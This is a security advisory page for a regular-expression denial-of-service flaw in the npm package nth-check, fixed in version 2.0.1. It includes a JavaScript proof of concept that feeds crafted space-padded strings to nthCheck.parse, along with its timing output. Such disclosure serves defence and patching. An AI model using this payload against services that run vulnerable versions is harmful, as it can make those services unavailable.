GHSA-rp65-9cf3-cjxr

    Dashboard / Vulnerabilities / GHSA-rp65-9cf3-cjxr

    GHSA-rp65-9cf3-cjxr

    Published: 20 Sept 2021Last Modified: 10 Sept 2026
    Aliases:

    Summary: Inefficient Regular Expression Complexity in nth-check

    Details: There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks. The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern `\s*(?:([+-]?)\s*(\d+))?` with quantified overlapping adjacency and can be exploited with the following code. **Proof of Concept** ```js // PoC.js var nthCheck = require("nth-check") for(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = '2n' + ' '.repeat(i*10000)+"!"; try { nthCheck.parse(attack_str) } catch(err) { var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } } ``` **The Output** ``` attack_str.length: 10003: 174 ms attack_str.length: 20003: 1427 ms attack_str.length: 30003: 2602 ms attack_str.length: 40003: 4378 ms attack_str.length: 50003: 7473 ms ```

    Affected packages

    Package

    Name: nth-check

    Purl: pkg:npm/nth-check

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -2.0.1

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    GHSA-rp65-9cf3-cjxr | CVE-DB